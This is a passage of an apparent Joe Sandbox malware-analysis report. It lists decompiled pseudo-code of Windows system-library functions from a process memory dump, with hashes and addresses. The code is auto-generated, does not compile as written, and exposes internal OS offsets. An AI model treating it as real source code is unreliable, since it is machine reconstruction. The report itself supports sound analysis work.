0x046b10da
0x046b10da
0x046b10e9
0x046b10f5
0x046b10f5
0x046b10fe

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a264b1825cb174c2cedf1e0f88bedfdb856081fcacc99f8273895a7fdcce48e
Instruction ID: 47c070748ce7af6e190f9790fff7e4b65b6f0aca343d518819c4b33c7956c0f3
Opcode Fuzzy Hash: 1a264b1825cb174c2cedf1e0f88bedfdb856081fcacc99f8273895a7fdcce48e
Instruction Fuzzy Hash: 62016832604B41ABD710EF28C804B9A77D5AB80344F048529F88183390FE30F980CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 045FB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045FB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04607D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04667016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x045fb037
0x045fb039
0x045fb03b
0x045fb040
0x0464a60e
0x00000000
0x00000000
0x0464a61d
0x045fb04b
0x045fb04e
0x0464a627
0x0464a634
0x00000000
0x00000000
0x0464a641
0x0464a653
0x0464a643
0x0464a64c
0x0464a64c
0x0464a65b
0x00000000
0x00000000
0x00000000
0x0464a66c
0x045fb057
0x045fb057
0x045fb057
0x045fb046
0x045fb046
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 77b3ad856027aeb79c3ade6919945fd8191b31c93eb298acd8164a72d567b457
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 0001DF72300980EFD722CB9CD888F6677DCFB81744F0900A1FA19CBA91E628FC40D222

Uniqueness

Uniqueness Score: -1.00%

Function 046B8ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E046B8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x46dd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04607D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0462B640(E04629AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x046b8ed6
0x046b8ee5
0x046b8eed
0x046b8ef0
0x046b8efa
0x046b8f03
0x046b8f0c
0x046b8f15
0x046b8f24
0x046b8f27
0x046b8f31
0x046b8f43
0x046b8f33
0x046b8f3c
0x046b8f3c
0x046b8f4e
0x046b8f4f
0x046b8f51
0x046b8f56
0x046b8f69

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8274ef5ab376d61d9353c610f31bc63439c0ea5aa620002fe3a391ba8ede4563
Instruction ID: 3da117ff77b918707ab3be0beb6f27601c36836dd54d8d7545c942e1404135f1
Opcode Fuzzy Hash: 8274ef5ab376d61d9353c610f31bc63439c0ea5aa620002fe3a391ba8ede4563
Instruction Fuzzy Hash: 2B111E70E006199FDB04DFA8D541BAEB7F4FF08300F0442AAE918EB381E634A940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046B8A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E046B8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x46dd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04607D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0462B640(E04629AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x046b8a62
0x046b8a71
0x046b8a79
0x046b8a82
0x046b8a85
0x046b8a89
0x046b8a8c
0x046b8a8f
0x046b8a92
0x046b8a95
0x046b8a9f
0x046b8ab1
0x046b8aa1
0x046b8aaa
0x046b8aaa
0x046b8abc
0x046b8abd
0x046b8abf
0x046b8ac4
0x046b8ada

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad56a4f0416d5e37ad1606a7a8104a1289302809d5d72d14aa045e011659480
Instruction ID: 5438785d1ff9fe7273f2d7ba4f82a3b152f4b158d87d98cde5e1fd144dd8bf23
Opcode Fuzzy Hash: 8ad56a4f0416d5e37ad1606a7a8104a1289302809d5d72d14aa045e011659480
Instruction Fuzzy Hash: 77012171A0121CAFDB04DFA9D9419EEB7B8EF49710F10405AF904E7341E634A901CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 045EDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045EDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E045EDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E045EE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L045EE8B0(__ecx, _t14, 0xfff);
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x045edb64
0x045edb66
0x045edb6b
0x045edbaa
0x045edb71
0x045edb76
0x045edb7a
0x045edba3
0x045edb7c
0x045edb87
0x045edb8b
0x04644fa1
0x04644fb3
0x04644fb8
0x045edb91
0x045edb96
0x045edb98
0x045edb98
0x045edb8b
0x045edb7a
0x045edb9d
0x045edba2

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 4ef3f37209cbfc2cdddac20d0717d78fcfda5dd04e0458a0c02e12a4196a54c4
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: E7F0C8336415239BE77A5A574880B37A6AEAFC1A60F150435F1059B244EA64AC06BAE0

Uniqueness

Uniqueness Score: -1.00%

Function 045EB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045EB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04607D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04607D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04667016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x045eb1e8
0x045eb1ea
0x045eb1f3
0x04644a17
0x045eb1f9
0x045eb1f9
0x045eb1f9
0x045eb201
0x04644a21
0x04644a2e
0x00000000
0x00000000
0x04644a3b
0x04644a4d
0x04644a3d
0x04644a46
0x04644a46
0x04644a55
0x00000000
0x00000000
0x00000000
0x045eb20a
0x045eb20a
0x045eb20a
0x045eb20a

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 8e9b5d8205bc2cc2bd2b74356fd99e621727ae4258fc3b4c924b242ce99bae00
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: D001F9323005809BDB269B5ED804F6A7B98FF91759F084062FA158B7F2FA75F840D314

Uniqueness

Uniqueness Score: -1.00%

Function 0467FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0467FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x46dd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04607D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0462B640(E04629AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0467fe96
0x0467fe9e
0x0467fea1
0x0467fead
0x0467feb3
0x0467feb9
0x0467fec3
0x0467fed5
0x0467fec5
0x0467fece
0x0467fece
0x0467fee0
0x0467fee1
0x0467fee3
0x0467fee8
0x0467fefb

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d461d4c935e55c3f56568d170a662c8cb25678f09f2042b6892ab2a32db5a7fe
Instruction ID: 61d462c89f3a77fd8a5163ec73259e5b93a5375f5cb3af261060282c47c1e4de
Opcode Fuzzy Hash: d461d4c935e55c3f56568d170a662c8cb25678f09f2042b6892ab2a32db5a7fe
Instruction Fuzzy Hash: 6E016270A00208AFCB14DFA8D542A6EB7F4EF04304F104169E904DB382E635EA01CB84

Uniqueness

Uniqueness Score: -1.00%

Function 046B8F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E046B8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x46dd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04607D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0462B640(E04629AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x046b8f6a
0x046b8f79
0x046b8f81
0x046b8f84
0x046b8f8b
0x046b8f91
0x046b8f94
0x046b8f9e
0x046b8fb0
0x046b8fa0
0x046b8fa9
0x046b8fa9
0x046b8fbb
0x046b8fbc
0x046b8fbe
0x046b8fc3
0x046b8fd6

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab6de12018dda130bb5a9ef1e9645a7b87f81bdd4e81101ecde986cb0469203c
Instruction ID: eb973a486abdb1313a34ff9bfb5ceb8d390417a9dac31d33078b82c467ad70a3
Opcode Fuzzy Hash: ab6de12018dda130bb5a9ef1e9645a7b87f81bdd4e81101ecde986cb0469203c
Instruction Fuzzy Hash: 10014474E0120CAFDB04EFA8D545AAEB7F8EF48300F10405AB945EB380FA34EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046A131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E046A131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x46dd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04607D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0462B640(E04629AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x046a131b
0x046a132a
0x046a1330
0x046a1336
0x046a133e
0x046a1341
0x046a1344
0x046a134f
0x046a1361
0x046a1351
0x046a135a
0x046a135a
0x046a136c
0x046a136d
0x046a136f
0x046a1374
0x046a1387

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afb0c06e56668741e1a8fb38051eb4cd78d9786689a6ccd468f2d13dd3585e4
Instruction ID: c7d0aefcc81da58c7ec2967c8187f8cddba5e0be9fb750003a55f482fb2fc384
Opcode Fuzzy Hash: 2afb0c06e56668741e1a8fb38051eb4cd78d9786689a6ccd468f2d13dd3585e4
Instruction Fuzzy Hash: E7013C71E0161CAFDB04EFA9D545AAEB7F4FF49700F00806AB955EB381F634AA10CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046A1608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E046A1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x46dd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04607D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0462B640(E04629AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x046a1608
0x046a1617
0x046a161d
0x046a1625
0x046a1628
0x046a162b
0x046a1636
0x046a1648
0x046a1638
0x046a1641
0x046a1641
0x046a1653
0x046a1654
0x046a1656
0x046a165b
0x046a166e

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8143c9f8f553eb321e69bb59e11420c948695d6909286bd03b1e1a0ab45f7f70
Instruction ID: c1c4a748196f95317872e80b2294f9d6e11868fcef44ad83b923ba5c517250a3
Opcode Fuzzy Hash: 8143c9f8f553eb321e69bb59e11420c948695d6909286bd03b1e1a0ab45f7f70
Instruction Fuzzy Hash: EFF06271F01658EFDB14EFA8D515AAEB7F4EF15300F044069A915EB381F634AD00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0460C577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0460C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0460C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x45c11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E046B88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0460c577
0x0460c57d
0x0460c581
0x0460c5b5
0x0460c5b9
0x0460c5ce
0x0460c5ce
0x0460c5ca
0x00000000
0x0460c5ca
0x0460c5c4
0x0460c5c8
0x00000000
0x00000000
0x00000000
0x0460c5ad
0x00000000
0x0460c5af

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49bd3b4de6cda51659c900962cd09783bf96c54d9804d8a6a4e1f7444ee7204
Instruction ID: 538df7a2387843ea194b1f08ab0638b7a641461f2434b301dc67ff165118a104
Opcode Fuzzy Hash: d49bd3b4de6cda51659c900962cd09783bf96c54d9804d8a6a4e1f7444ee7204
Instruction Fuzzy Hash: 32F0FABA9116908FE73F8B288044B237BE89B14370F44CA6AD406833C1F2A4FCA0C240

Uniqueness

Uniqueness Score: -1.00%

Function 046B8D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E046B8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x46dd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04607D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0462B640(E04629AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x046b8d34
0x046b8d43
0x046b8d4b
0x046b8d4e
0x046b8d52
0x046b8d5c
0x046b8d6e
0x046b8d5e
0x046b8d67
0x046b8d67
0x046b8d79
0x046b8d7a
0x046b8d7c
0x046b8d81
0x046b8d94

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1af03f28a064b4eca907407861b92813132f9446c12c70eea28016b6c8c071d
Instruction ID: 5e735e2388ee01716d4b8a83bdde5033dc5391dc8407775325b3831406da3880
Opcode Fuzzy Hash: f1af03f28a064b4eca907407861b92813132f9446c12c70eea28016b6c8c071d
Instruction Fuzzy Hash: 04F09070E04608AFD714EFA8D541AAE77B8EB14700F10809AE905AB280FA34E9008B94

Uniqueness

Uniqueness Score: -1.00%

Function 046A2073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E046A2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0469FD22(__ecx);
				_t19 =  *0x46d849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x46d8748; // 0x0
					if(__eflags <= 0) {
						E046A1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x46d8724 & 0x00000004;
							if(( *0x46d8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x46d8724; // 0x0
					return E04698DF1(__ebx, 0xc0000374, 0x46d5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x046a2076
0x046a2078
0x046a207d
0x046a2083
0x046a20a4
0x046a20aa
0x046a20ac
0x046a20b7
0x046a20ba
0x046a20bc
0x046a20c9
0x046a20c9
0x046a20d0
0x046a20d2
0x00000000
0x046a20d2
0x046a20be
0x046a20c3
0x046a20c5
0x046a20c7
0x00000000
0x00000000
0x046a20c7
0x046a20bc
0x046a20d4
0x046a2085
0x046a2085
0x046a20a3
0x046a20a3

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2dd176c9cb6796964782feb65fa7bdd23866373fc8d306f84f6845924d46e70
Instruction ID: 57c9c93e99f7224976b900ad46eaf063cc4307c09a388a89f98f7333ead8106b
Opcode Fuzzy Hash: f2dd176c9cb6796964782feb65fa7bdd23866373fc8d306f84f6845924d46e70
Instruction Fuzzy Hash: A9F0276A8229844AEF327F2521243D52BC4C756214F0D14CAD46017300F53CAC93CE24

Uniqueness

Uniqueness Score: -1.00%

Function 0462927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0462927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0462FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E046292C6(_t11, _t14);
				}
				return _t11;
			}

0x04629295
0x04629299
0x0462929f
0x046292aa
0x046292ad
0x046292ae
0x046292af
0x046292b0
0x046292b4
0x046292bb
0x046292bb
0x046292c5

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: eff9aaaba4738157aad5ba096e80b6ae220b1abb00e113db85d0baa9ac1d24ea
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
